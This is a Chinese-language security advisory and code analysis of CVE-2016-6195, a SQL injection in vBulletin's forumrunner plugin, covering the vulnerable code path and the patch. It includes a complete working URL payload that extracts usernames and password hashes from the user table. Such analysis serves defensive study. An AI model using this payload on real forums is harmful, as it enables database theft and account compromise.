Author: janes(知道創宇404安全實驗室)
Date: 2016-11-15
漏洞概述
漏洞簡介
vBulletin 是一個商業論壇程序,使用PHP語言編寫,有研究者發現VBulletin核心插件forumrunner存在SQL注入漏洞: CVE-2016-6195. 插件forumrunner默認開啟, 利用該漏洞,攻擊者能夠利用SQL注入漏洞脫庫。
漏洞影響
攻擊者能夠利用SQL注入漏洞脫庫
影響版本
3.6.x ~ 4.2.1
4.2.2 ~ 4.2.2 Patch Level 5
4.2.3 ~ 4.2.3 Patch Level 1
漏洞分析
分析所用版本
4.2.1
漏洞的本質是forumrunner/includes/moderation.php文件中, do_get_spam_data()函數()對參數postids和threadid過濾不嚴導致SQL注入漏洞, 核心代碼如下:
function do_get_spam_data (){
global $vbulletin, $db, $vbphrase;
$vbulletin->input->clean_array_gpc('r', array(
'threadid' => TYPE_STRING,
'postids' => TYPE_STRING,
));
...
}else if ($vbulletin->GPC['postids'] != '') {
$postids = $vbulletin->GPC['postids'];
$posts = $db->query_read_slave("
SELECT post.postid, post.threadid, post.visible, post.title, post.userid,
thread.forumid, thread.title AS thread_title, thread.postuserid, thread.visible AS thread_visible, thread.firstpostid
FROM " . TABLE_PREFIX . "post AS post
LEFT JOIN " . TABLE_PREFIX . "thread AS thread USING (threadid)
WHERE postid IN ($postids)
");VBulletin程序中并不直接使用$_GET等全局變量獲取輸入數據,而是使用clean_gpc() 和 clean_array_gpc() 函數來過濾輸入數據,而這兩個函數并未對STRING類型做嚴格過濾,而傳入的參數postids是作為SRING類型解析,參數postids隨后拼接在SQL語句中進行查詢,導致SQL注入漏洞。
尋找調用或包含do_get_spam_data()函數的代碼,發現forumrunner/support/common_methods.php
'get_spam_data' => array(
'include' => 'moderation.php',
'function' => 'do_get_spam_data',
),繼續回溯,發現forumrunner/request.php文件包含support/common_methods.php.
...
$processed = process_input(array('cmd' => STRING, 'frv' => STRING, 'frp' => STRING));
if (!$processed['cmd']) {
return;
}
...
require_once(MCWD . '/support/common_methods.php');
...
if (!isset($methods[$processed['cmd']])) {
json_error(ERR_NO_PERMISSION);
}
if ($methods[$processed['cmd']]['include']) {
require_once(MCWD . '/include/' . $methods[$processed['cmd']]['include']);
}
if (isset($_REQUEST['d'])) {
error_reporting(E_ALL);
}
$out = call_user_func($methods[$processed['cmd']]['function']);
...上面代碼中process_input()函數(forumrunner/support/utils.php), 會從$_REQUEST中取值,進行簡單的類型轉換,STRING類型則原樣返回,根據上面代碼,可以通過$_REQUEST['cmd']參數調用get_spam_data()函數, 進而調用do_get_spam_data()函數。設置$_REQUEST['d']參數將打開錯誤報告,有助于SQL注入,當然也可以不設置$_REQUEST['d']參數,這對觸發SQL注入漏洞沒有影響。剩下的就是使用postids參數構造SQL payload
postids參數注入
payload: forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)union select 1,2,3,(select concat(username, 0x3a, password) from user),5,1,7,8,9,10--+
設置斷點及變量取值,注入結果如下:
從圖中可以看出SQL注入語句執行成功,$post['title']變量已經獲取了用戶名和密碼,其中forumid設置為1, 保證下面代碼不會進入if條件判斷語句中。
while ($post = $db->fetch_array($posts))
{
$forumperms = fetch_permissions($post['forumid']);
if (
!($forumperms & $vbulletin->bf_ugp_forumpermissions['canview'])
OR
!($forumperms & $vbulletin->bf_ugp_forumpermissions['canviewthreads'])
OR
(!($forumperms & $vbulletin->bf_ugp_forumpermissions['canviewothers']) AND $post['postuserid'] != $vbulletin->userinfo['userid'])
)
{
json_error(ERR_NO_PERMISSION);
}補丁分析
includes/general_vb.php文件, fr_clean_ids函數對id類變量進行了整數轉換,從而阻止SQL注入攻擊。
function fr_clean_ids($list = ”)
{
$arr = explode(‘,’,$list);
$cleanarr = array_map(‘intval’,$arr);
return implode(‘,’,$cleanarr);
}forumrunner/include/moderation.php文件, do_get_spam_data函數過濾$postids和$threadid 參數
$vbulletin->GPC[‘postids’] = fr_clean_ids($vbulletin->GPC[‘postids’]);
...
if ($vbulletin->GPC[‘threadid’] != ”) {
$threadids = $vbulletin->GPC[‘threadid’];
$threadids = fr_clean_ids($threadids);
...修復方案
-
更新VBulletin程序版本(>4.2.3)
reference
https://www.seebug.org/vuldb/ssvid-92354
https://enumerated.wordpress.com/2016/07/11/1/
http://blog.securelayer7.net/vbulletin-sql-injection-exploit-cve-2016-6195/
本文由 Seebug Paper 發布,如需轉載請注明來源。本文地址:http://www.jmbmsq.com/116/
暫無評論